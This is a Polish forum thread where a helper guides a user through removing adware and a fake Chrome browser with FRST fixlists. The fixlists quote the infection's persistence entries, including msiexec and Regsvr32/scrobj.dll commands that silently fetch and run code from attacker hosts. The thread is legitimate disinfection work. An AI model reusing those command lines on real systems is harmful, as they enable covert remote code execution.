mtbshadow utworzono 22 kwietnia 2017 utworzono 22 kwietnia 2017 (edytowane) Witam, od pewnego czasu obserwuję spadek wydajności komputera, a od kilku dni wyskakujące reklamy i przejęcie przeglądarki Chrome przez stronę startową LuckySearch i zmianę domyślnej wyszukiwarki Google na Yahoo czy inną. Skanowanie darmowym Avastem nic nie daje, CCleaner nic a podczas użycia opcji skan w programie ADVcleaner wyskakuje błąd "sqlite3.dll is corrupted or has been replaced". Proszę o pokierowanie w wyczyszczeniu komputera z badziewu który się nagromadził. Pozdrawiam. Dodaję pliki z frst. Addition.txt FRST.txt Edytowane 22 kwietnia 2017 przez mtbshadow
Twój_Anioł_Stróż komentarz 22 kwietnia 2017 komentarz 22 kwietnia 2017 (edytowane) 1) Odinstaluj niepotrzebny do niczego Akamai NetSession Interface 2) Cytuj C:\Users\shadow\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Boxbob\Application\chrome.exe (Google Inc.) C:\Users\shadow\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Boxbob\Application\chrome.exe (Google Inc.) C:\Users\shadow\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk -> C:\Program Files (x86)\Boxbob\Application\chrome.exe (Google Inc.) C:\Users\shadow\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\e99d70d39d04ef\Google Chrome.lnk -> C:\Program Files (x86)\Boxbob\Application\chrome.exe (Google Inc.) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Boxbob\Application\chrome.exe (Google Inc.) C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Boxbob\Application\chrome.exe (Google Inc.) Te skróty dam do usuwania, bo przekierowują do fałszywej przeglądarki C:\Program Files (x86)\Boxbob\Application\chrome.exe, która wygląda jak Google Chrome, ale w rzeczywistości jest Trojanem. Potem zrobisz sobie nowe skróty w tych samych lokalizacjach. 3) To chyba nie jest Twój profil w Chrome? Cytuj CHR DefaultProfile: dropesqrutherchedus Adware podstawiło w Google Chrome całkowicie nowy profil ChromeDefaultData (nazwa wyświetlana user0), który należy usunąć. Czyli: Ustawienia > karta Ustawienia > Osoby > Dodaj Osobę, następnie zaloguj się na nowy profil, zamknij okno poprzedniego, w Ustawieniach skasuj "user0". 4) Otwórz Notatnik i wklej w nim: Cytuj HKU\S-1-5-21-2133346594-796014199-2007101735-1000\...\ChromeHTML: -> C:\Program Files (x86)\Boxbob\Application\chrome.exe (Google Inc.) <==== UWAGA C:\Users\shadow\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\shadow\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\shadow\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\Users\shadow\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\e99d70d39d04ef\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk RemoveDirectory: C:\Program Files (x86)\Boxbob RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\shadow\AppData\Local\3DM RemoveDirectory: C:\Users\shadow\AppData\LocalLow\Mozilla RemoveDirectory: C:\Users\shadow\AppData\Local\Firefox RemoveDirectory: C:\Program Files (x86)\MIO RemoveDirectory: C:\Users\shadow\AppData\Local\Kitty RemoveDirectory: C:\Users\shadow\AppData\Roaming\Firefox RemoveDirectory: C:\Users\shadow\AppData\Local\Eastness RemoveDirectory: C:\ProgramData\Software RemoveDirectory: C:\Program Files (x86)\Eastness RemoveDirectory: C:\Program Files (x86)\BiaoJi RemoveDirectory: C:\Users\shadow\AppData\Roaming\SSMgre 2015-08-28 20:19 - 2015-11-27 12:44 - 0000098 _____ () C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat HKU\S-1-5-21-2133346594-796014199-2007101735-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1WFTlSMjI8FdVQMWH4MWZSRTLYRYQXOWU1MYU3FjI2MF== /q IFEO\taskmgr.exe: [Debugger] Task: {0BCED6A3-950D-4D02-BB47-4827FDF6A558} - System32\Tasks\{5E4F47C6-BE97-47EA-AD3E-F088CFBC6617} => pcalua.exe -a J:\SETUP.EXE -d J:\ Task: {4DD8B7DD-6A12-4851-A3CB-0783EEDC8640} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1WFTlSMjI8FdVQMWH4MWZSRTLYRYQXOWU1MYU3FjI2MF== scrobj.dll Task: {B2ACB66C-49E4-4E63-B152-EF041B64E328} - System32\Tasks\{826B2E5B-D3EE-48A9-BE33-12697BC4F38E} => pcalua.exe -a C:\Users\shadow\Downloads\ADOBE.Photoshop.CS3.extended\ADOBE.Photoshop.CS3.extended\adobe.photoshop.cs3.extended.pl\Adobe.Photoshop.CS3.Extended.PL\Adobe.Photoshop.CS3.Extended.PL\Setup.exe -d C:\Users\shadow\Downloads\ADOBE.Photoshop.CS3.extended\ADOBE.Photoshop.CS3.extended\adobe.photoshop.cs3. (dane wartości zawierają 75 znaków więcej). Task: {C0A050F0-F966-41A5-8455-DB5B1F94702D} - System32\Tasks\shadowEightballLouisiananV2 => Rundll32.exe BloodthirstierBodysurfs.dll,main 7 1 <==== UWAGA Task: {E5C4178D-1928-43B6-AD2E-D587726460AC} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1WFTlSMjI8FdVQMWH4MWZSRTLYRYQXOWU1MYU3FjI2MF== scrobj.dll HKLM\...\.scr: SageThumbsImage.scr => "%1" /S <===== UWAGA MSCONFIG\startupreg: Akamai NetSession Interface => "C:\Users\shadow\AppData\Local\Akamai\netsession_win.exe" C:\Users\shadow\AppData\Local\Akamai\netsession_win.exe FirewallRules: [{D47D3DD9-0B72-4A9C-A8B4-5104B3A768F2}] => (Allow) C:\Program Files (x86)\Boxbob\Application\chrome.exe FirewallRules: [{1C42FE2C-8B51-492C-A91C-4FFD285287E9}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <======= UWAGA BHO-x32: Brak nazwy -> {B69F34DD-F0F9-42DC-9EDD-957187DA688D} -> Brak pliku FF Extension: (FF Adr) - C:\Users\shadow\AppData\Roaming\Firefox\Firefox\Profiles\rox8p0id.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-04-21] [Brak podpisu cyfrowego] CHR HomePage: dropesqrutherchedus -> hxxps://www.google.pl/webhp?sourceid=chrome-instant&ion=1&espv=2&ie=UTF-8 CHR Profile: C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus [2017-04-21] <==== UWAGA CHR Extension: (Prezentacje Google) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-09-17] CHR Extension: (Dokumenty Google) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\aohghmighlieiainnegkcijnfilokake [2015-09-17] CHR Extension: (Dysk Google) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-22] CHR Extension: (gorescript classic) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\bbohlinegjlacogbjchanihbiiboabcp [2017-04-21] CHR Extension: (Video AdBlock for Chrome) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\bknbnapaddjdnbilpmlacdkjdkjmbjhd [2015-11-27] CHR Extension: (YouTube) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-25] CHR Extension: (Pong 2) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\capmpnebnckdpjbjdcgnokjafpdbmadn [2016-12-07] CHR Extension: (Google Search) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-28] CHR Extension: (Avast Online Security (BETA)) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\daanglpcpkjjlkhcbladppjphglbigam [2017-04-01] CHR Extension: (Team Tanks) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\fanaoobcoplmfmebhjddichbapochmad [2016-11-23] CHR Extension: (Avast SafePrice (BETA)) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\fcoadmpfijfcmokecmkgolhbaeclfage [2017-02-28] CHR Extension: (Arkusze Google) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-09-17] CHR Extension: (ManaPlus) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\fgdcjlfkdeadkbplfhkbjjccagjepodj [2017-04-20] CHR Extension: (Klasyczny niebieski motyw) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\gapfoeoijjkibljnhednndeabimdilek [2016-11-13] CHR Extension: (Dokumenty Google offline) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-15] CHR Extension: (Avast Online Security) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\gomekmidlodglbbmalcneegieacbdmki [2017-04-07] CHR Extension: (V8 Pro Parking) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\jholdmdaddpcjaihhcgmjlomigoppfmn [2016-12-29] CHR Extension: (Road Blocks) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\ldcpoimjjikjcphnnlphcajepbfbdmeo [2016-11-20] CHR Extension: (Płatności w sklepie Chrome Web Store) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-09] CHR Extension: (e-pity - dodatek) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\ofoeigeaodhbjogdigckajfhjbonaofg [2017-02-10] CHR Extension: (Gmail) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-09-17] CHR Extension: (Chrome Media Router) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-04-09] S3 aspnet_state; %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [X] S3 FirefoxU; "C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe" [X] S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X] S3 IT9135BDA; System32\Drivers\IT9135BDA.sys [X] 2017-04-21 16:15 - 2017-04-21 16:15 - 00002000 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk 2017-04-21 16:15 - 2017-04-21 16:15 - 00001930 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk 2017-04-21 16:15 - 2017-04-21 16:15 - 00000000 ____D C:\Program Files (x86)\Firefox 2017-04-21 16:15 - 2017-04-21 16:15 - 00000000 _____ C:\Windows\SysWOW64\33 2017-04-21 16:14 - 2017-04-21 16:14 - 00000000 ____D C:\Users\shadow\AppData\Local\Boxbob 2017-04-21 16:14 - 2017-04-21 16:14 - 00000000 ____D C:\Program Files (x86)\Boxbob 2017-04-21 16:14 - 2017-04-21 16:14 - 00000000 _____ C:\Windows\SysWOW64\11 2017-04-17 17:02 - 2017-04-22 09:08 - 00000000 _____ C:\Users\Public\Documents\temp.dat 2017-04-17 17:02 - 2017-04-21 16:15 - 00000000 _____ C:\Users\Public\Documents\report.dat C:\Users\shadow\Downloads\keyboardex(dobreprogramy.pl).exe HOSTS: EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe Uruchom FRST i kliknij przycisk Fix (NAPRAW). 5) Zrób nowe logi FRST. Edytowane 22 kwietnia 2017 przez Twój_Anioł_Stróż
mtbshadow komentarz 22 kwietnia 2017 Autor komentarz 22 kwietnia 2017 Mam nadzieję że wszystko zrobiłem zgodnie z poleceniem. W załączeniu log Fixlog który pojawił się zaraz po naprawie oraz logi wygenerowane po naprawie. FRST.txt Addition.txt Fixlog.txt
Twój_Anioł_Stróż komentarz 22 kwietnia 2017 komentarz 22 kwietnia 2017 (edytowane) 1) Spróbuj odinstalować ten program: PriceFountain (HKU\S-1-5-21-2133346594-796014199-2007101735-1000\...\EightballLouisianan) (Version: - ) <==== UWAGA 2) Otwórz Notatnik i wklej w nim: Cytuj FirewallRules: [TCP Query User{0E839B7C-3E79-4910-91C5-86F9AF885A88}C:\users\shadow\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\shadow\appdata\local\akamai\netsession_win.exe FirewallRules: [UDP Query User{FAB6FEA9-03C3-48EC-8963-ECE31F7F68B2}C:\users\shadow\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\shadow\appdata\local\akamai\netsession_win.exe DeleteKey: HKU\S-1-5-21-2133346594-796014199-2007101735-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EightballLouisianan DeleteKey: HKU\S-1-5-21-2133346594-796014199-2007101735-1000\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EightballLouisianan FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [Brak pliku] R2 WindowsOfficeSrv; C:\ProgramData\Microsoft\OneDrive\Uploader.dll [108544 2017-04-21] () [Brak podpisu cyfrowego] <==== UWAGA C:\ProgramData\Microsoft\OneDrive\Uploader.dll EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe Uruchom FRST i kliknij przycisk Fix (NAPRAW). 3) Teraz spróbuj od nowa ściągnąć Adw-Cleaner, i go użyć najpierw kliknij na SKANUJ (SCAN), a dopiero po zakończeniu skanowania, gdy uaktywni się przycisk USUŃ (CLEANING), to kliknij na niego. Edytowane 22 kwietnia 2017 przez Twój_Anioł_Stróż
mtbshadow komentarz 23 kwietnia 2017 Autor komentarz 23 kwietnia 2017 Programu PriceFountain nie znalazłem korzystając z systemowego "programy i funkcje". Z Adw-Cleaner ten sam komunikat o błędzie "sqlite3.dll is corrupted or has been replaced". Logi z FRST. Przy uruchomieniu Chroma już nie wyskakuje LuckySearch. Addition.txt Fixlog.txt FRST.txt
Twój_Anioł_Stróż komentarz 23 kwietnia 2017 komentarz 23 kwietnia 2017 (edytowane) Cytuj CHR Profile: C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus [2017-04-23] <==== UWAGA Skoro u Ciebie nie udało się usunąć tego profilu, to przeinstaluj Google Chrome. Otwórz Notatnik i wklej w nim: Cytuj ShortcutWithArgument: C:\Users\shadow\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\4eab15b5934b9a57\Google Chrome.lnk -> C:\FRST\Quarantine\C\Program Files (x86)\Boxbob\Application\chrome.exe (Google Inc.) -> --profile-directory=dropesqrutherchedus FirewallRules: [TCP Query User{F16C7387-F45B-4C4C-A10B-9B708026C59F}C:\users\shadow\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\shadow\appdata\local\akamai\netsession_win.exe FirewallRules: [UDP Query User{133005DD-C077-4B3B-9273-A42CDF57F627}C:\users\shadow\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\shadow\appdata\local\akamai\netsession_win.exe CHR DefaultProfile: dropesqrutherchedus CHR Profile: C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus [2017-04-23] <==== UWAGA CHR Extension: (Prezentacje Google) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-04-22] CHR Extension: (Dokumenty Google) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\aohghmighlieiainnegkcijnfilokake [2017-04-22] CHR Extension: (Dysk Google) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-04-22] CHR Extension: (YouTube) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-04-22] CHR Extension: (Avast Online Security (BETA)) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\daanglpcpkjjlkhcbladppjphglbigam [2017-04-22] CHR Extension: (Avast SafePrice (BETA)) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\fcoadmpfijfcmokecmkgolhbaeclfage [2017-04-22] CHR Extension: (Arkusze Google) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-04-22] CHR Extension: (Dokumenty Google offline) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-04-22] CHR Extension: (Avast Online Security) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\gomekmidlodglbbmalcneegieacbdmki [2017-04-22] CHR Extension: (Weather Hub) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\kbejacapfbbfcbonimhhmpdbbpjdoplf [2017-04-22] CHR Extension: (Płatności w sklepie Chrome Web Store) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-04-22] CHR Extension: (e-pity - dodatek) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\ofoeigeaodhbjogdigckajfhjbonaofg [2017-04-22] CHR Extension: (Gmail) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-04-22] CHR Extension: (Chrome Media Router) - C:\Users\shadow\AppData\Local\Google\Chrome\User Data\dropesqrutherchedus\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-04-22] CHR HKU\S-1-5-21-2133346594-796014199-2007101735-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bknbnapaddjdnbilpmlacdkjdkjmbjhd] - hxxp://clients2.google.com/service/update2/crx EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe Uruchom FRST i kliknij przycisk Fix (NAPRAW). . Edytowane 23 kwietnia 2017 przez Twój_Anioł_Stróż
mtbshadow komentarz 23 kwietnia 2017 Autor komentarz 23 kwietnia 2017 Zrobione, Chrome odinstalowany i zainstalowany na nowo, naprawione FRST, po czym przeskanowane FRST, w załączeniu logi. Addition.txt Fixlog.txt FRST.txt
Twój_Anioł_Stróż komentarz 23 kwietnia 2017 komentarz 23 kwietnia 2017 Otwórz Notatnik i wklej w nim: 2017-04-20 18:51 - 2015-08-26 17:10 - 00000000 ___HD C:\Program Files (x86)\Temp 2017-04-22 13:04 - 2017-04-23 08:29 - 00000000 _____ C:\Users\Public\Documents\temp.dat EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe Uruchom FRST i kliknij przycisk Fix (NAPRAW). Potem chyba możemy kończyć: Otwórz Notatnik i wklej w nim: DeleteQuarantine: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST. Uruchom FRST i kliknij w Fix (NAPRAW). przez SHIFT+DEL usuń pozostały folder C:\FRST. .
mtbshadow komentarz 23 kwietnia 2017 Autor komentarz 23 kwietnia 2017 Wykonane, po luckysearch nie został już ślad, wrzucać jeszcze raz logi z FRST czy to już koniec walki z robalami ?
mtbshadow komentarz 23 kwietnia 2017 Autor komentarz 23 kwietnia 2017 31 minut temu, Twój_Anioł_Stróż napisał: Koniec. W takim razie dzięki wielkie za pomoc i przeprowadzenie przez tą skomplikowaną procedurę Może jeszcze jakaś wskazówka jak skutecznie zapobiegać takim sytuacjom i czym skutecznie we własnym zakresie sprzątać komputer żeby sytuacja się nie powtarzała ?
Twój_Anioł_Stróż komentarz 23 kwietnia 2017 komentarz 23 kwietnia 2017 Na razie nie mam wiedzy, w jakich okolicznościach pojawia się ta infekcja, więc nie wiem, czego konkretnie unikać.
Wciąż szukasz rozwiązania problemu? Napisz teraz na forum!
Możesz zadać pytanie bez konieczności rejestracji - wystarczy, że wypełnisz formularz.